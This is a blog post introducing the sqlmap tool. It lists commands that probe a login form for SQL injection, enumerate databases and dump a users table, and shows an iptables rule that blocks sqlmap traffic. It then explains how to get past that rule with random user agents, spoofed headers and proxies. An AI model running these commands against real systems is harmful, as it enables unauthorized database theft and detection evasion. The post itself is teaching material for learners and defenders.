Recently, I was doing a CTF (article here) and used sqlmap for the first time. When I used it, I wasn’t too sure what all was going on, so I thought it would be a good idea to do a writeup about it. I’ve decided to make a new series called “Tool Time“ where I introduce you (and sometimes me) to a security tool. In general, these articles will serve as a good introduction into the tool (basic source data, how to use it and some random information).
I’m going to attempt to develop out a format for these articles for consistency. As this is the first one, future articles may change.
Better Know Your Tool
Site: sqlmap on GitHub
Language: Python (2.6.x and 2.7.x)
Kali included: yes (just run sqlmap)
What is sqlmap?
It’s a tool to detect and exploit SQL injection vulnerabilities in database servers.
This tool can do a lot, so it’s best to spend some time looking into all of the options.
$ sqlmap -hh
That command (or python sqlmap.py -hh) will give you all of the options/switches. You can use -h instead, which will give you less information.
If you want all of the features, take a look at their WIKI. There’s a lot listed.
Sqlmap supports many database management systems, such as MySQL, Oracle, Microsoft SQL Server, etc.
It can enumerate users, passwords, hashing, tables, columns and more. It can also connect directly to the DB.
And it can search for specific database names, tables and columns.
Here’s a quick example of using sqlmap.
Getting initial DB information:
$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit"
Getting a list of databases on the system (MySQL):
$ sqlmap -u "http://mytarget/login.php" --data="user=1&password=1&s=Submit" --dbms=mysql --dbs
Getting tables inside of a database (MyWordpressDB):
$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --tables -D MyWordpressDB
Getting data inside of a table (users):
$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --dump --T users -D MyWordpressDB
Another example would be just pointing -u to a page that takes a GET parameter and going from there.
Using sqlmap is pretty loud. I pointed it at my test wordress VM and just ran the initial check (telling sqlmap that I was using MySQL).
The result was something like 100+ log entries instantly like this:
192.168.119.128 - - [01/Aug/2015:16:23:38 -0700] "POST /wp-login.php HTTP/1.1" 200 1568 "-" "sqlmap/1.0-dev-nongit-20150719 (http://sqlmap.org)"
After testing this tool against one of my VMs, my next task was to update my IP TABLES to detect sqlmap.
Here’s a real quick n dirty example:
$ sudo iptables -I INPUT -p tcp --dport 80 -m string --algo bm --string "sqlmap.org" -j DROP
This rule looks for sqlmap.org in the tcp request on port 80 and drops it. Of course, if you have any other request come in with that text that happens to be legitimate, it’s gone too.
So now that sqlmap is blocked, what now? Random agents.
$ sqlmap -u http://192.168.119.134/?s=lkk --dbms=MySQL --random-agent
And now the log will look something like:
192.168.119.128 - - [01/Aug/2015:17:12:13 -0700] "GET /?s=lkk%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 3308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:18.104.22.168) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6"
Of interest will be options:
- random-agent (use a randomly selected HTTP UA value)
- user-agent=WHATEVER (passing in a specific UA to use)
- host=WHATEVER (HTTP Host header value)
- referer=WHATEVER (HTTP referer value)
- proxy=PROXY (Use a proxy to connect to target)